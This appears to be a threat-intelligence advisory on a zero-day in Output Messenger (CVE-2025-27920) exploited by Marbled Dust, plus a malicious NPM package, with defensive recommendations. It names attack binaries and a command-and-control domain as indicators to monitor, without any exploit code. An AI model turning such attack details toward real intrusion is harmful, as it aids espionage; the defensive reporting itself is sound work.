This intelligence update highlights a sophisticated cybersecurity threat involving a zero-day vulnerability identified as CVE-2025-27920 in Output Messenger, a communication platform widely used for internal organizational communications. The vulnerability is actively exploited by the Marbled Dust threat group, a known cyberspy actor, targeting Kurdish military users in Iraq. The exploitation involves malicious binaries such as omclientservice.exe and omserverservice.exe, indicating compromise of both client and server components of the messaging platform. This zero-day allows attackers to gain unauthorized access, enabling espionage activities including data exfiltration, command and control, and persistent access within targeted environments. The attack demonstrates advanced capabilities and a targeted intent by Marbled Dust, emphasizing the threat’s sophistication and potential for long-term compromise. Additionally, the update reports a malicious NPM package discovered that hides multi-stage malware using obfuscation techniques involving Unicode and Google Calendar, posing a significant supply chain risk to software development environments. This malware could lead to infections, data theft, or lateral movement within networks, especially affecting development pipelines relying on NPM packages. While positive developments such as disruption of a major botnet, arrest of a ransomware actor, and dismantling of a dark web marketplace are noted, the zero-day exploitation in Output Messenger remains the most concerning due to its targeted nature and potential for persistent espionage. No patch or mitigation is currently available for CVE-2025-27920, and no widespread exploitation beyond the targeted attacks has been reported. Indicators such as the domain api.wordinfos.com may relate to command and control infrastructure or malware communication channels. Overall, this threat represents a sophisticated compromise of a communication platform with significant espionage implications and supply chain risks.

For European organizations, the immediate direct impact of this zero-day exploitation is currently limited as active exploitation targets Kurdish military users in Iraq. However, the presence of a zero-day vulnerability in a widely used communication platform like Output Messenger poses a latent risk to any European entity using this software or similar messaging solutions. If exploited, attackers could gain unauthorized access to sensitive communications, leading to breaches of confidentiality, potential manipulation of message integrity, and disruption of communication availability. The espionage capabilities demonstrated by Marbled Dust suggest that similar tactics could be adapted against European military, governmental, or critical infrastructure targets, especially those with geopolitical interests in the Middle East or Kurdish regions. The malicious NPM package threat also presents a significant supply chain risk to European software development environments, potentially leading to malware infections, data theft, or lateral movement within networks. This could impact software integrity and availability of development resources. Although botnet and ransomware disruptions are positive, ongoing threats remain, underscoring the need for vigilance in supply chain security, zero-day vulnerability monitoring, and targeted espionage campaign defenses.

1. Conduct an immediate inventory and assessment of Output Messenger deployments to identify any presence of vulnerable components such as omclientservice.exe and omserverservice.exe. 2. Implement network segmentation and enforce strict access controls around communication servers to limit lateral movement in case of compromise. 3. Monitor network traffic for suspicious connections to domains like api.wordinfos.com or other anomalous outbound communications indicative of command and control activity. 4. Deploy endpoint detection and response (EDR) solutions with behavioral analytics to detect multi-stage malware and obfuscated payloads, particularly in development environments using NPM packages. 5. Enforce strict code signing and package integrity verification for all third-party software dependencies, including NPM packages, to prevent supply chain compromise. 6. Increase user awareness and training on phishing and social engineering tactics that could deliver malware. 7. Collaborate with threat intelligence sharing communities to receive timely updates on patches or indicators related to CVE-2025-27920 and Marbled Dust activities. 8. Prepare incident response plans specifically addressing espionage and zero-day exploitation scenarios, including forensic readiness and communication protocols. 9. Consider alternative secure communication platforms with active patch management if Output Messenger cannot be immediately secured. 10. Regularly audit and update DNS configurations to prevent DNS hijacking attempts linked to this threat.